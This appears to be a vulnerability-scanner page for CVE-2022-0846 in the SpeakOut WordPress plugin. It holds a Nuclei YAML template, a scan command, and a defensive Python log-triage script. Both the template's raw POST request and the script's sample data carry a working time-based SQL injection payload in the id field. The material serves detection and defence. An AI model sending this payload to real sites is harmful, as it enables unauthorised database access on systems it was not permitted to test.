SpeakOut Email Petitions < 2.14.15.1 - SQL Injection
ID: CVE-2022-0846
Severity: critical
Author: theamanrawat
Tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project
Description
The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
YAML Source
id: CVE-2022-0846

info:
  name: SpeakOut Email Petitions < 2.14.15.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in version 2.14.15.1
  reference:
    - https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4
    - https://wordpress.org/plugins/speakout/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0846
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/DharmaDoll/Search-Poc-from-CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0846
    cwe-id: CWE-89
    epss-score: 0.04032
    epss-percentile: 0.92073
    cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: speakout\!_email_petitions_project
    product: speakout\!_email_petitions
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,unauth,wpscan,sqli,speakout,speakout-email-petitions,speakout\!_email_petitions_project

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")'
        condition: and
# digest: 4b0a00483046022100f718c85e6038b244360942feb445420414d79e0de91b419a82ab83d4e94052c9022100ed68fae979450feb02220bc881e7018d6c69ab7a81996cba527327facaed70af:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-0846.yaml"
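For defenders reviewing traffic to an affected site, the description above points at one field: the id sent with the dk_speakout_sendmail action. The following is an added example, not part of the template or the plugin, that triages request records for that action and flags any id that is not a plain integer. It assumes petition ids are small positive integers and that your proxy or WAF logs capture form bodies and response times; the record layout, the sample records and the 5-second threshold are constructed for illustration.

```python
"""Triage logged admin-ajax requests for non-numeric SpeakOut petition ids."""
import re
from urllib.parse import parse_qs

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "dk_speakout_sendmail"
# Assumption: a legitimate petition id is a small positive integer.
INT_ID = re.compile(r"[0-9]{1,10}")

# Constructed records: (client, method, path, form-encoded body, response seconds)
SAMPLE_RECORDS = [
    ("198.51.100.7", "POST", AJAX_PATH, "action=dk_speakout_sendmail&id=12&email=a%40example.org", 0.21),
    ("203.0.113.9", "POST", AJAX_PATH, "action=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu", 6.30),
    ("203.0.113.9", "POST", AJAX_PATH, "action=heartbeat&id=abc", 0.05),
    ("192.0.2.44", "POST", AJAX_PATH, "action=dk_speakout_sendmail&id=7&id=7%27", 0.19),
    ("192.0.2.50", "POST", AJAX_PATH, "action=dk_speakout_sendmail", 0.10),
]


def suspicious_ids(body):
    """Return the decoded id values in a form body that are not plain integers."""
    fields = parse_qs(body, keep_blank_values=True)
    if ACTION not in fields.get("action", []):
        return []
    # Check every value: a duplicated id field can hide the one the server uses.
    return [v for v in fields.get("id", []) if not INT_ID.fullmatch(v)]


def triage(records, slow_seconds=5.0):
    """Return one finding per request to the action that carries a non-integer id."""
    findings = []
    for client, method, path, body, elapsed in records:
        if method != "POST" or path.split("?", 1)[0] != AJAX_PATH:
            continue
        bad = suspicious_ids(body)
        if bad:
            findings.append({"client": client, "ids": bad, "slow": elapsed >= slow_seconds})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

A finding with slow set to True lines up with the delay the template's duration matcher checks for; the fix stated in the template is updating the plugin to 2.14.15.1.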